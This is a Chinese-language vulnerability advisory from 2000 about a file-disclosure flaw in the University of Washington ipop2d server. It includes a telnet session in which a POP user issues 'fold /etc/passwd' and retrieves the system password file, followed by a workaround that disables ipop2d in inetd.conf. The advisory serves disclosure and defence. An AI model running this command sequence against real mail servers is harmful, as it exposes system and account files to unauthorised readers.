发布日期：2000-07-20
更新日期：2000-07-20

受影响系统：

University of Washington pop2d 4.55
   + University of Washington imap 4.7(a/b/c)
University of Washington pop2d 4.54
   + University of Washington imap 4.6
University of Washington pop2d 4.51
   + University of Washington imap 4.5
      + RedHat Linux 6.2
University of Washington pop2d 4.46
   + University of Washington imap 4.4

描述：

---

ipop2d是Washington大学imap软件包中的一部分。ipop v4.55以及以前的版本都存在一个安全漏
洞，允许任意有一个pop账号的用户浏览系统文件(这个文件必须是任何人或者组可读的)。在通常情
况下这并不是安全问题，但是如果对于那些只想提供POP访问权限的系统，这个问题就将泄漏某些系
统信息，潜在增加了受攻击的风险。

<* 来源：<mandark@mandark.jumpline.com> *>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[mandark@mandark mandark]$ telnet localhost 109
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
+ POP2 localhost.localdomain v4.46 server ready
helo mandark blehpasshere
#1 messages in /var/spool/mail/mandark
read 1
=389 characters in message 1
retr
Return-Path: <root@mandark.jumpline.com>
Received: (from root@localhost)
by mandark.jumpline.com (8.10.1/8.10.1) id e6EGS7C27037
for mandark@localhost; Fri, 14 Jul 2000 12:28:07 -0400
Date: Fri, 14 Jul 2000 12:28:07 -0400
From: root <root@mandark.jumpline.com>
Message-Id: <200007141628.e6EGS7C27037@mandark.jumpline.com>
To: mandark@mandark.jumpline.com
Status: RO

message is here...

acks
=0 No more messages
fold /etc/passwd
#1 messages in /etc/passwd
read 1
=1178 characters in message 1
retr
Date: Thu, 13 Jul 2000 16:50:07 -0400
From: root@mandark.jumpline.com
Subject: /etc/passwd
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
postfix:x:101:104:postfix:/var/spool/postfix:
gdm:x:0:0::/home/gdm:/bin/bash
mandark:x:500:503::/home/mandark:/bin/bash
godie:x:0:0::/home/godie:/bin/bash
mp3:x:501:506::/mp3:/bin/bash
chefo:x:502:507::/home/chefo:/bin/bash
crunch:x:503:508::/home/crunch:/bin/bash
gsx:x:505:510::/home/gsx:/bin/csh
matt:x:506:511::/home/matt:/bin/bash
lyw0d:x:507:512::/home/lyw0d:/bin/bash

建议：

---

暂无。
临时解决办法：
在/etc/inetd.conf中注释掉ipop2d行：
#pop-2   stream  tcp     nowait  root    /usr/sbin/tcpd ipop2d


浏览次数：7172
严重程度：0（网友投票）